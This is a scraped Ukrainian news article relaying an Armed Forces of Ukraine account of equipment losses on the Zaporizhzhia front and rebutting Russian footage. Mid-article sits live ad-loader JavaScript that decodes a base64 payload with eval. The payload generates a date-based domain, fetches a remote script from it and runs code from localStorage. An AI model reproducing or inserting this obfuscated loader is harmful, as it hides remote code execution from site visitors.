Важкі бої з втратами на Запорізькому напрямку: розлоге офіційне пояснення ЗСУ

На Запорізькому напрямку окупанти хоч і знищили кілька одиниць техніки ЗСУ, але справжня картина бойових дій залишається за кадром.

Про це повідомляє «Акцент» з посиланням на повідомлення ЗСУ, у якому розвіяли тези російської пропаганди про провалений «контрнаступ» України. Зазначимо, мова йде про знищення двох танків Leopard 2 та 13 БМП Bradley, про які у тому числі пишуть закорднонні ЗМІ.

«Третю ніч поспіль ширяться російські балачки про відновлення наступальних дій українців вночі на Запорізькому напрямку.Проте є деякі важливі зауваження», — пишуть в ЗСУ.

В ЗСУ зауважують, що майже всі кадри поширюють російські джерела зосереджені на втратах ЗС України. Більшість втрат вже були кілька днів тому та/або деякі були вже оприлюднені, продемонстрованими з іншої точки зору. Втрати також іноді показують, що українці знаходяться південніше, ніж очікувалося.

«Там, де глядачі бачать один пошкоджений автомобіль, їх було більше і які не постраждали…«, — йдеться у тексті. Далі повідомлення Генерального штаба ЗСУ приводимо дослівно. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Україна, в свою чергу, оприлюднила кілька кадрів з обох південних напрямків: Про те, що за останні 3 дні Україні вдалося знищити 2 ТОС-1А, один у Великій Новосілці та один у Бахмутському напрямку. Такого раніше не було під час цієї війни.Це допомагає визначити, що українці скупі щодо оприлюднення матеріалів з огляду на безпеку військових операцій. Але ті нечасті кадри, які були оприлюднені, показують, що відбувається щось більше. І неприємніше для росіян.

Кількість знищенної техніки

Україна отримала тисячі одиниць військової техніки, понад тисячу одиниць тільки для нових бригад.Це війна проти ешелонованої оборони. ЗСУ втратить багато техніки. Це частина наступу. Цифри, які показують росіяни, ніщо в порівнянні з ціною, які Україна може очікувати від наступальних дій, локальних навіть.Але що важливіше: люди. Солдати. Більшість знищених транспортних засобів, скоріш за все, знищуються мінами. Неозброєним оком видно, що люки відкриті, крові немає, тіл майже немає. Отже машини виконали те, для чого були призначені: захистити воїнів усередині. Транспортні засоби можна замінити, людей – ні. І, мабуть, важко прийняти сувору правду: людські втрати під час наступу передбачаються і очікуються.

Висновок

Російська сторона розповсюджує кадри знищеної української техніки, а українська сторона тримає жорсткі рамки для комплексу заходів щодо забезпечення прихованості приготувань до бойових дій і продовжує працювати за лаштунками.Фахівці зі звичайних бойових дій сьогодні рідкість, і минули десятиліття з тих пір, як ми бачили війну такого масштабу. Отже, майте це на увазі, уважно спостерігаючи за цією війною. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/vazhki-boyi-z-vtratami-na-zaporizkomu-napryamku-rozloge-ofitsijne-poyasnennya-zsu/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет

Добавить комментарий

scroll to top